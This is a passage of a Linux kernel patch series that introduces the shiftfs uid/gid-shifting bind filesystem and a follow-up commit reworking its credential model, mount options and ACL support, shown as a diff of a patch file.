-+#include <linux/uidgid.h>
-+#include <linux/xattr.h>
-+
-+struct shiftfs_super_info {
-+	struct vfsmount *mnt;
-+	struct user_namespace *userns;
-+	bool mark;
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry);
-+
-+enum {
-+	OPT_MARK,
-+	OPT_LAST,
-+};
-+
-+/* global filesystem options */
-+static const match_table_t tokens = {
-+	{ OPT_MARK, "mark" },
-+	{ OPT_LAST, NULL }
-+};
-+
-+static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct cred *cred = prepare_creds();
-+
-+	if (!cred)
-+		return NULL;
-+
-+	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
-+	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
-+	put_user_ns(cred->user_ns);
-+	cred->user_ns = get_user_ns(ssi->userns);
-+
-+	return cred;
-+}
-+
-+static const struct cred *shiftfs_new_creds(const struct cred **newcred,
-+					    struct super_block *sb)
-+{
-+	const struct cred *cred = shiftfs_get_up_creds(sb);
-+
-+	*newcred = cred;
-+
-+	if (cred)
-+		cred = override_creds(cred);
-+	else
-+		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+
-+	return cred;
-+}
-+
-+static void shiftfs_old_creds(const struct cred *oldcred,
-+			      const struct cred **newcred)
-+{
-+	if (!*newcred)
-+		return;
-+
-+	revert_creds(oldcred);
-+	put_cred(*newcred);
-+}
-+
-+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+{
-+	char *p;
-+	substring_t args[MAX_OPT_ARGS];
-+
-+	ssi->mark = false;
-+
-+	while ((p = strsep(&options, ",")) != NULL) {
-+		int token;
-+
-+		if (!*p)
-+			continue;
-+
-+		token = match_token(p, tokens, args);
-+		switch (token) {
-+		case OPT_MARK:
-+			ssi->mark = true;
-+			break;
-+		default:
-+			return -EINVAL;
-+		}
-+	}
-+	return 0;
-+}
-+
-+static void shiftfs_d_release(struct dentry *dentry)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	dput(real);
-+}
-+
-+static struct dentry *shiftfs_d_real(struct dentry *dentry,
-+				     const struct inode *inode)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (unlikely(real->d_flags & DCACHE_OP_REAL))
-+		return real->d_op->d_real(real, real->d_inode);
-+
-+	return real;
-+}
-+
-+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		return 1;
-+
-+	return real->d_op->d_weak_revalidate(real, flags);
-+}
-+
-+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int ret;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	/*
-+	 * inode state of underlying changed from positive to negative
-+	 * or vice versa; force a lookup to update our view
-+	 */
-+	if (d_is_negative(real) != d_is_negative(dentry))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
-+		return 1;
-+
-+	ret = real->d_op->d_revalidate(real, flags);
-+
-+	if (ret == 0 && !(flags & LOOKUP_RCU))
-+		d_invalidate(real);
-+
-+	return ret;
-+}
-+
-+static const struct dentry_operations shiftfs_dentry_ops = {
-+	.d_release	= shiftfs_d_release,
-+	.d_real		= shiftfs_d_real,
-+	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_weak_revalidate = shiftfs_d_weak_revalidate,
-+};
-+
-+static int shiftfs_readlink(struct dentry *dentry, char __user *data,
-+			    int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	const struct inode_operations *iop = real->d_inode->i_op;
-+
-+	if (iop->readlink)
-+		return iop->readlink(real, data, flags);
-+
-+	return -EINVAL;
-+}
-+
-+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
-+				    struct delayed_call *done)
-+{
-+	if (dentry) {
-+		struct dentry *real = dentry->d_fsdata;
-+		struct inode *reali = real->d_inode;
-+		const struct inode_operations *iop = reali->i_op;
-+		const char *res = ERR_PTR(-EPERM);
-+
-+		if (iop->get_link)
-+			res = iop->get_link(real, reali, done);
-+
-+		return res;
-+	} else {
-+		/* RCU lookup not supported */
-+		return ERR_PTR(-ECHILD);
-+	}
-+}
-+
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err = -EOPNOTSUPP;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_setxattr(real, name, value, size, flags);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_get(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, void *value, size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_getxattr(real, name, value, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
-+				 size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_listxattr(real, list, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_removexattr(real, name);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, const void *value, size_t size,
-+			     int flags)
-+{
-+	if (!value)
-+		return shiftfs_removexattr(dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+}
-+
-+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+{
-+	struct inode *reali;
-+
-+	if (!dentry)
-+		return;
-+
-+	reali = dentry->d_inode;
-+
-+	if (!reali->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	inode->i_mapping = reali->i_mapping;
-+	inode->i_private = dentry;
-+}
-+
-+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
-+			       umode_t mode, const char *symlink,
-+			       struct dentry *hardlink, bool excl)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+	bool op_ok = false;
-+
-+	if (hardlink) {
-+		op_ok = iop->link;
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			op_ok = iop->mkdir;
-+			break;
-+		case S_IFREG:
-+			op_ok = iop->create;
-+			break;
-+		case S_IFLNK:
-+			op_ok = iop->symlink;
-+		}
-+	}
-+	if (!op_ok)
-+		return -EINVAL;
-+
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
-+	if (!newi)
-+		return -ENOMEM;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	err = -EINVAL;		/* shut gcc up about uninit var */
-+	if (hardlink) {
-+		struct dentry *realhardlink = hardlink->d_fsdata;
-+
-+		err = vfs_link(realhardlink, reali, new, NULL);
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			err = vfs_mkdir(reali, new, mode);
-+			break;
-+		case S_IFREG:
-+			err = vfs_create(reali, new, mode, excl);
-+			break;
-+		case S_IFLNK:
-+			err = vfs_symlink(reali, new, symlink);
-+		}
-+	}
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		goto out_dput;
-+
-+	shiftfs_fill_inode(newi, new);
-+
-+	d_instantiate(dentry, newi);
-+
-+	new = NULL;
-+	newi = NULL;
-+
-+ out_dput:
-+	dput(new);
-+	iput(newi);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+			  umode_t mode,  bool excl)
-+{
-+	mode |= S_IFREG;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+}
-+
-+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+			 umode_t mode)
-+{
-+	mode |= S_IFDIR;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+}
-+
-+static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
-+			struct dentry *dentry)
-+{
-+	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+			   const char *symlink)
-+{
-+	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+}
-+
-+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	if (rmdir)
-+		err = vfs_rmdir(reali, new);
-+	else
-+		err = vfs_unlink(reali, new, NULL);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, false);
-+}
-+
-+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, true);
-+}
-+
-+static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+			  struct inode *newdir, struct dentry *new,
-+			  unsigned int flags)
-+{
-+	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
-+		*realold = old->d_fsdata,
-+		*realnew = new->d_fsdata, *trap;
-+	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	int err = -EINVAL;
-+	const struct cred *oldcred, *newcred;
-+
-+	trap = lock_rename(rndd, rodd);
-+
-+	if (trap == realold || trap == realnew)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
-+
-+	err = vfs_rename(realolddir, realold, realnewdir,
-+			 realnew, NULL, flags);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+ out_unlock:
-+	unlock_rename(rndd, rodd);
-+
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
-+				     unsigned int flags)
-+{
-+	struct dentry *real = dir->i_private, *new;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock(reali);
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	if (IS_ERR(new))
-+		return new;
-+
-+	dentry->d_fsdata = new;
-+
-+	newi = NULL;
-+	if (!new->d_inode)
-+		goto out;
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
-+	if (!newi) {
-+		dput(new);
-+		return ERR_PTR(-ENOMEM);
-+	}
-+
-+ out:
-+	return d_splice_alias(newi, dentry);
-+}
-+
-+static int shiftfs_permission(struct inode *inode, int mask)
-+{
-+	struct dentry *real = inode->i_private;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	if (mask & MAY_NOT_BLOCK)
-+		return -ECHILD;
-+
-+	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
-+	if (iop->permission)
-+		err = iop->permission(reali, mask);
-+	else
-+		err = generic_permission(reali, mask);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct iattr newattr = *attr;
-+	const struct cred *oldcred, *newcred;
-+	struct super_block *sb = dentry->d_sb;
-+	int err;
-+
-+	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
-+	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	inode_lock(reali);
-+	if (iop->setattr)
-+		err = iop->setattr(real, &newattr);
-+	else
-+		err = simple_setattr(real, &newattr);
-+	inode_unlock(reali);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		return err;
-+
-+	/* all OK, reflect the change on our inode */
-+	setattr_copy(d_inode(dentry), attr);
-+	return 0;
-+}
-+
-+static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+			   u32 request_mask, unsigned int query_flags)
-+{
-+	struct inode *inode = path->dentry->d_inode;
-+	struct dentry *real = path->dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
-+	int err = 0;
-+
-+	if (iop->getattr)
-+		err = iop->getattr(&newpath, stat, request_mask, query_flags);
-+	else
-+		generic_fillattr(reali, stat);
-+
-+	if (err)
-+		return err;
-+
-+	/* transform the underlying id */
-+	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
-+	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	return 0;
-+}
-+
-+static const struct inode_operations shiftfs_inode_ops = {
-+	.lookup		= shiftfs_lookup,
-+	.getattr	= shiftfs_getattr,
-+	.setattr	= shiftfs_setattr,
-+	.permission	= shiftfs_permission,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.get_link	= shiftfs_get_link,
-+	.readlink	= shiftfs_readlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.create		= shiftfs_create,
-+	.mknod		= NULL,	/* no special files currently */
-+	.listxattr	= shiftfs_listxattr,
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry)
-+{
-+	struct inode *inode;
-+
-+	inode = new_inode(sb);
-+	if (!inode)
-+		return NULL;
-+
-+	/*
-+	 * our inode is completely vestigial.  All lookups, getattr
-+	 * and permission checks are done on the underlying inode, so
-+	 * what the user sees is entirely from the underlying inode.
-+	 */
-+	mode &= S_IFMT;
-+
-+	inode->i_ino = get_next_ino();
-+	inode->i_mode = mode;
-+	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+
-+	inode->i_op = &shiftfs_inode_ops;
-+
-+	shiftfs_fill_inode(inode, dentry);
-+
-+	return inode;
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	if (ssi->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
-+	if (err)
-+		return err;
-+
-+	buf->f_type = sb->s_magic;
-+
-+	return 0;
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	mntput(ssi->mnt);
-+	put_user_ns(ssi->userns);
-+	kfree(ssi);
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	struct shiftfs_data *data = raw_data;
-+	char *name = kstrdup(data->path, GFP_KERNEL);
-+	int err = -ENOMEM;
-+	struct shiftfs_super_info *ssi = NULL;
-+	struct path path;
-+	struct dentry *dentry;
-+
-+	if (!name)
-+		goto out;
-+
-+	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
-+	if (!ssi)
-+		goto out;
-+
-+	err = -EPERM;
-+	err = shiftfs_parse_options(ssi, data->data);
-+	if (err)
-+		goto out;
-+
-+	/* to mark a mount point, must be real root */
-+	if (ssi->mark && !capable(CAP_SYS_ADMIN))
-+		goto out;
-+
-+	/* else to mount a mark, must be userns admin */
-+	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		goto out;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out;
-+
-+	err = -EPERM;
-+
-+	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
-+		err = -ENOTDIR;
-+		goto out_put;
-+	}
-+
-+	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put;
-+	}
-+
-+	if (ssi->mark) {
-+		/*
-+		 * this part is visible unshifted, so make sure no
-+		 * executables that could be used to give suid
-+		 * privileges
-+		 */
-+		sb->s_iflags = SB_I_NOEXEC;
-+		ssi->mnt = path.mnt;
-+		dentry = path.dentry;
-+	} else {
-+		struct shiftfs_super_info *mp_ssi;
-+
-+		/*
-+		 * this leg executes if we're admin capable in
-+		 * the namespace, so be very careful
-+		 */
-+		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
-+			goto out_put;
-+		mp_ssi = path.dentry->d_sb->s_fs_info;
-+		if (!mp_ssi->mark)
-+			goto out_put;
-+		ssi->mnt = mntget(mp_ssi->mnt);
-+		dentry = dget(path.dentry->d_fsdata);
-+		path_put(&path);
-+	}
-+	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	sb->s_fs_info = ssi;
-+	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_op = &shiftfs_super_ops;
-+	sb->s_xattr = shiftfs_xattr_handlers;
-+	sb->s_d_op = &shiftfs_dentry_ops;
-+	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_root->d_fsdata = dentry;
-+
-+	return 0;
-+
-+ out_put:
-+	path_put(&path);
-+ out:
-+	kfree(name);
-+	kfree(ssi);
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
-+				    int flags, const char *dev_name, void *data)
-+{
-+	struct shiftfs_data d = { data, dev_name };
-+
-+	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
-+}
-+
-+static struct file_system_type shiftfs_type = {
-+	.owner		= THIS_MODULE,
-+	.name		= "shiftfs",
-+	.mount		= shiftfs_mount,
-+	.kill_sb	= kill_anon_super,
-+	.fs_flags	= FS_USERNS_MOUNT,
-+};
-+
-+static int __init shiftfs_init(void)
-+{
-+	return register_filesystem(&shiftfs_type);
-+}
-+
-+static void __exit shiftfs_exit(void)
-+{
-+	unregister_filesystem(&shiftfs_type);
-+}
-+
-+MODULE_ALIAS_FS("shiftfs");
-+MODULE_AUTHOR("James Bottomley");
-+MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_LICENSE("GPL v2");
-+module_init(shiftfs_init)
-+module_exit(shiftfs_exit)
-diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
-index 6325d1d0e90f..1f70efb41565 100644
---- a/include/uapi/linux/magic.h
-+++ b/include/uapi/linux/magic.h
-@@ -102,4 +102,6 @@
- #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
- #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
- 
-+#define SHIFTFS_MAGIC		0x6a656a62
-+
- #endif /* __LINUX_MAGIC_H__ */
--- 
-2.39.2
-
-From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-/* Introduction */
-The shiftfs filesystem is implemented as a stacking filesystem. Since it is
-a stacking filesystem it shares concepts with overlayfs and ecryptfs.
-Usually, shiftfs will be stacked upon another filesystem. The filesystem on
-top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
-filesystem it is stacked upon is referred to as "lower filesystem" or
-"underlay".
-
-/* Marked and Unmarked shiftfs mounts */
-To use shiftfs it is necessary that a given mount is marked as shiftable via
-the "mark" mount option. Any mount of shiftfs without the "mark" mount option
-not on top of a shiftfs mount with the "mark" mount option will be refused with
-EPERM.
-After a marked shiftfs mount has been performed other shiftfs mounts
-referencing the marked shiftfs mount can be created. These secondary shiftfs
-mounts are usually the ones of interest.
-The marked shiftfs mount will take a reference to the underlying mountpoint of
-the directory it is marking as shiftable. Any unmarked shiftfs mounts
-referencing this marked shiftfs mount will take a second reference to this
-directory as well. This ensures that the underlying marked shiftfs mount can be
-unmounted thereby dropping the reference to the underlying directory without
-invalidating the mountpoint of said directory since the non-marked shiftfs
-mount still holds another reference to it.
-
-/* Stacking Depth */
-Shiftfs tries to keep the stack as flat as possible to avoid hitting the
-kernel enforced filesystem stacking limit.
-
-/* Permission Model */
-When the mark shiftfs mount is created shiftfs will record the credentials of
-the creator of the super block and stash it in the super block. When other
-non-mark shiftfs mounts are created that reference the mark shiftfs mount they
-will stash another reference to the creators credentials. Before calling into
-the underlying filesystem shiftfs will switch to the creators credentials and
-revert to the original credentials after the underlying filesystem operation
-returns.
-
-/* Mount Options */
-- mark
-  When set, the mark mount option indicates that the mount in question is
-  allowed to be shifted. Since shiftfs is mountable by user namespace root
-  in a non-initial user namespace, this mount option ensures that the system
-  administrator has decided that the marked mount is safe to be shifted.
-  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
-- passthrough={0,1,2,3}
-  This mount options functions as a bitmask. When set to a non-zero value
-  shiftfs will try to act as an invisible shim sitting on top of the
-  underlying filesystem.
-  - 1: Shiftfs will report the filesystem type of the underlay for stat-like
-       system calls.
-  - 2: Shiftfs will pass through whitelisted ioctl()s to the underlay.
-  - 3: Shiftfs will use both 1 and 2.
-Note that mount options on a marked mount cannot be changed.
-
-/* Extended Attributes */
-Shiftfs will make sure to translate extended attributes.
-
-/* Inode Numbers */
-Shiftfs inode numbers are copied up from the underlying filesystem, i.e.
-shiftfs inode numbers will be identical to the corresponding underlying
-filesystem's inode numbers. This has the advantage that inotify and friends
-should work out of the box.
-(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
- dentries and inodes.)
-
-/* Device Support */
-Shiftfs only supports the creation of pipe and socket devices. Character and
-block devices cannot be created through shiftfs.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig   |   10 +
- fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
- 2 files changed, 1493 insertions(+), 369 deletions(-)
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index b53bece1e940..ada9a1234e72 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -136,6 +136,16 @@ config SHIFT_FS
- 	  unprivileged containers can use this to mount root volumes
- 	  using this technique.
- 
-+config SHIFT_FS_POSIX_ACL
-+	bool "shiftfs POSIX Access Control Lists"
-+	depends on SHIFT_FS
-+	select FS_POSIX_ACL
-+	help
-+	  POSIX Access Control Lists (ACLs) support permissions for users and
-+	  groups beyond the owner/group/world scheme.
-+
-+	  If you don't know what Access Control Lists are, say N.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f7cada126daa..ad1ae5bce6c1 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,3 +1,4 @@
-+#include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
- #include <linux/file.h>
-@@ -7,83 +8,179 @@
- #include <linux/kernel.h>
- #include <linux/magic.h>
- #include <linux/parser.h>
-+#include <linux/security.h>
- #include <linux/seq_file.h>
- #include <linux/statfs.h>
- #include <linux/slab.h>
- #include <linux/user_namespace.h>
- #include <linux/uidgid.h>
- #include <linux/xattr.h>
-+#include <linux/posix_acl.h>
-+#include <linux/posix_acl_xattr.h>
-+#include <linux/uio.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
- 	struct user_namespace *userns;
-+	/* creds of process who created the super block */
-+	const struct cred *creator_cred;
- 	bool mark;
-+	unsigned int passthrough;
-+	struct shiftfs_super_info *info_mark;
- };
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry);
-+struct shiftfs_file_info {
-+	struct path realpath;
-+	struct file *realfile;
-+};
-+
-+struct kmem_cache *shiftfs_file_info_cache;
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry);
-+
-+#define SHIFTFS_PASSTHROUGH_NONE 0
-+#define SHIFTFS_PASSTHROUGH_STAT 1
-+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+
-+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	return true;
-+}
- 
- enum {
- 	OPT_MARK,
-+	OPT_PASSTHROUGH,
- 	OPT_LAST,
- };
- 
- /* global filesystem options */
- static const match_table_t tokens = {
- 	{ OPT_MARK, "mark" },
-+	{ OPT_PASSTHROUGH, "passthrough=%u" },
- 	{ OPT_LAST, NULL }
- };
- 
--static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+static const struct cred *shiftfs_override_creds(const struct super_block *sb)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct cred *cred = prepare_creds();
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 
--	if (!cred)
--		return NULL;
-+	return override_creds(sbinfo->creator_cred);
-+}
-+
-+static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
-+					       struct cred *newcred)
-+{
-+	revert_creds(oldcred);
-+	put_cred(newcred);
-+}
-+
-+static int shiftfs_override_object_creds(const struct super_block *sb,
-+					 const struct cred **oldcred,
-+					 struct cred **newcred,
-+					 struct dentry *dentry, umode_t mode,
-+					 bool hardlink)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	if (!hardlink) {
-+		int err = security_dentry_create_files_as(dentry, mode,
-+							  &dentry->d_name,
-+							  *oldcred, *newcred);
-+		if (err) {
-+			shiftfs_revert_object_creds(*oldcred, *newcred);
-+			return err;
-+		}
-+	}
- 
--	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
--	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
--	put_user_ns(cred->user_ns);
